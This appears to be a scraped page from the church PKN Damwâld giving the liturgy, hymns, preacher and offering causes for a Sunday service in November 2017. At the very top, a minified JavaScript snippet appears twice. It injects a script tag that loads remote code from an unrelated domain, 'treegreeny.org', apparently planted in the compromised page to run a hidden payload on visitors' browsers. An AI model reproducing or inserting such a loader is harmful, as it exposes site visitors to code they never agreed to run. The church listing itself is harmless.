;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 19 november 2017 9:30 uur - PKN Damwâld
zondag 19 november 2017
09:30 uur

Kerkdienst zondag 19 november 2017 9:30 uur

Informatie

Voorganger:Dhr. L. Blees, Damwâld
Organist:Nienke van der Heide-Visser
Liturgie
We zingen: Elb 147 vers 1, 4 en 6
Welkom en mededelingen
We zingen: Gezang 380 vers 1, 3,4 en 7
Stilgebed, Votum en Groet
We zingen: Psalm 108 vers 1 en 2
Wetslezing .
We zingen: ELB 302 vers 1, 2, 3 en 4
Gebed
We lezen: Psalm 73
We zingen: Psalm 73 vers 1 en 4
Preek .
We zingen: Psalm 73 vers 9 en 10
Dankgebed
Collecte
Slotlied ELB 357 vers 1, 3 en 5
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Rudolphstichting

Rudolpstichting
De Rudolphstichting onderhoudt gezinshuizen en zorgwoningen in Jeugddorp De Glind. Daarnaast ontwikkelt zij projecten die de zorg voor uithuis geplaatste kinderen en jongeren verbeteren en vernieuwen. Herstel van het normale leven is hierbij uitgangspunt. Zodat deze jongeren alle kans krijgen om zich te richten op de toekomst.

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds